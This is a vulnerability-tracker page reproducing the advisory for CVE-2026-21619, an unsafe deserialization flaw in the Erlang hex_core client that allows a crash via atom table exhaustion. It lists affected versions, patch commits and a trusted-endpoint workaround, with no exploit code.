Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
2.0
Hex Client Can Crash Due to Untrusted Data
CVE-2026-21619
GHSA-hx9w-f2w9-9g96
Summary
The Hex client can crash if it receives specially crafted data from the Hex API. This can happen if an attacker controls the data sent by the Hex API. To prevent this, update the Hex client to the latest version or ensure that the Hex API URL points only to trusted endpoints.
What to do
- Update hex_core to version 0.12.1.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | hex_core | <= 0.12.1 | 0.12.1 |
Original title
hex_core has Unsafe Deserialization of Erlang Terms
Original description
### Impact
The Hex client (`hex_core`) deserializes Erlang terms received from the Hex API using `binary_to_term/1` without sufficient restrictions.
If an attacker can control the HTTP response body returned by the Hex API, this allows denial-of-service attacks such as **atom table exhaustion**, leading to a VM crash. No released versions are known to allow remote code execution.
### Patches
* https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b13
* https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
* https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
### Workarounds
Ensure that the Hex API URL (`HEX_API_URL`) points only to trusted endpoints. There is no client-side workaround that fully mitigates this issue without applying the patch.
### Resources
* hex_core Module: https://github.com/hexpm/hex_core/blob/main/src/hex_api.erl
* Hex Vendored Module: https://github.com/hexpm/hex/blob/main/src/mix_hex_api.erl
* Rebar3 Vendored Module: https://github.com/erlang/rebar3/blob/main/apps/rebar/src/vendored/r3_hex_api.erl
* hex_core Patch: https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b13
* Hex Vendored Patch: https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
* Rebar3 Vendored Patch: https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
The Hex client (`hex_core`) deserializes Erlang terms received from the Hex API using `binary_to_term/1` without sufficient restrictions.
If an attacker can control the HTTP response body returned by the Hex API, this allows denial-of-service attacks such as **atom table exhaustion**, leading to a VM crash. No released versions are known to allow remote code execution.
### Patches
* https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b13
* https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
* https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
### Workarounds
Ensure that the Hex API URL (`HEX_API_URL`) points only to trusted endpoints. There is no client-side workaround that fully mitigates this issue without applying the patch.
### Resources
* hex_core Module: https://github.com/hexpm/hex_core/blob/main/src/hex_api.erl
* Hex Vendored Module: https://github.com/hexpm/hex/blob/main/src/mix_hex_api.erl
* Rebar3 Vendored Module: https://github.com/erlang/rebar3/blob/main/apps/rebar/src/vendored/r3_hex_api.erl
* hex_core Patch: https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b13
* Hex Vendored Patch: https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
* Rebar3 Vendored Patch: https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
nvd CVSS4.0
2.0
Vulnerability type
CWE-400
Uncontrolled Resource Consumption
CWE-502
Deserialization of Untrusted Data
- https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
- https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
- https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b1...
- https://github.com/hexpm/hex_core/security/advisories/GHSA-hx9w-f2w9-9g96
- https://nvd.nist.gov/vuln/detail/CVE-2026-21619
- https://github.com/advisories/GHSA-hx9w-f2w9-9g96
Published: 1 Mar 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026